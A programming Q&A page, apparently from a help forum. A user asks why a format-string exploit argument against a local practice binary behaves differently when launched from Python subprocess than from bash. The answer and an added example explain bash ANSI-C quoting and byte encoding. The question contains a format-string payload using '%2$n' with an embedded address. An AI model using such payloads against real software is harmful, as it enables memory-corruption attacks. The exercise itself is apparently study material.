I've got a string/argument that I'd like to pass to a C program. It's a string format exploit.
'\xb2\x33\02\x08x%2$n'
However, there seems to be different behaviours exhibited if I call the C program from Python by doing
subprocess.Popen(["env", "-i", "./practice", '\xb2\x33\02\x08x%2$n'])
versus
./practice '\xb2\x33\02\x08x%2$n'
The difference is that the string exploit attack works as expected when calling the script via subprocess, but not when I call it through the CLI.
What might the reason be? Thanks.
CodePudding user response:
Bash manpage says:
Words of the form $'string' are treated specially. The word expands to string, with backslash-escaped characters replaced as specified by the ANSI C standard. Backslash escape sequences, if present, are decoded as follows: [snipped]
\xHH the eight-bit character whose value is the hexadecimal value HH (one or two hex digits)
Then would you please try:
./practice $'\xb2\x33\02\x08x%2$n'
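The following is an added example, not part of the question or the answer above, that makes the difference visible without running the vulnerable program: it hex-dumps the bytes a command would actually receive in argv[1] under single quotes versus bash ANSI-C quoting. It assumes `bash`, `od` and `tr` are available; `ansi_c_hex` invokes bash explicitly so the `$'...'` decoding is bash's own even if the script itself is run by plain sh (the helper names are chosen here and are not from the page).

```shell
# Hex-dump the raw bytes of the argument with no spaces (e.g. "4142").
# This is exactly the byte sequence a C program would see in argv[1].
arg_hex() {
    printf '%s' "$1" | od -An -v -tx1 | tr -d ' \n'
}

# Parse $1 as a bash ANSI-C quoted word ($'...') and hex-dump the result.
# bash is started explicitly so the decoding step is done by bash, not by
# whatever shell runs this script. $1 must not contain a single quote.
ansi_c_hex() {
    bash -c "printf '%s' \$'$1'" | od -An -v -tx1 | tr -d ' \n'
}

# Single quotes pass backslash sequences through literally: the program
# receives the eight characters \ x 4 1 \ x 4 2, not two bytes.
literal=$(arg_hex '\x41\x42')      # 5c7834315c783432 (8 bytes)

# $'...' decodes \xHH (hex) and \nnn (octal, one to three digits) before
# exec, so the program receives exactly the two bytes 0x41 0x42.
decoded=$(ansi_c_hex '\x41\x42')   # 4142 (2 bytes)

# Mixed octal and hex escapes, the same forms used in the question's \02\x08.
mixed=$(ansi_c_hex '\02\x08')      # 0208

echo "single-quoted : $literal"
echo "ANSI-C quoted : $decoded"
echo "octal + hex   : $mixed"
```

The same check is worth applying on the Python side: in Python 3 a `str` argument to `subprocess.Popen` is encoded (normally as UTF-8) before `execve`, so a code point such as `'\xb2'` arrives as two bytes; passing a `bytes` object is what delivers raw single bytes. Comparing the hex dump from both launch paths shows immediately which one is changing the payload.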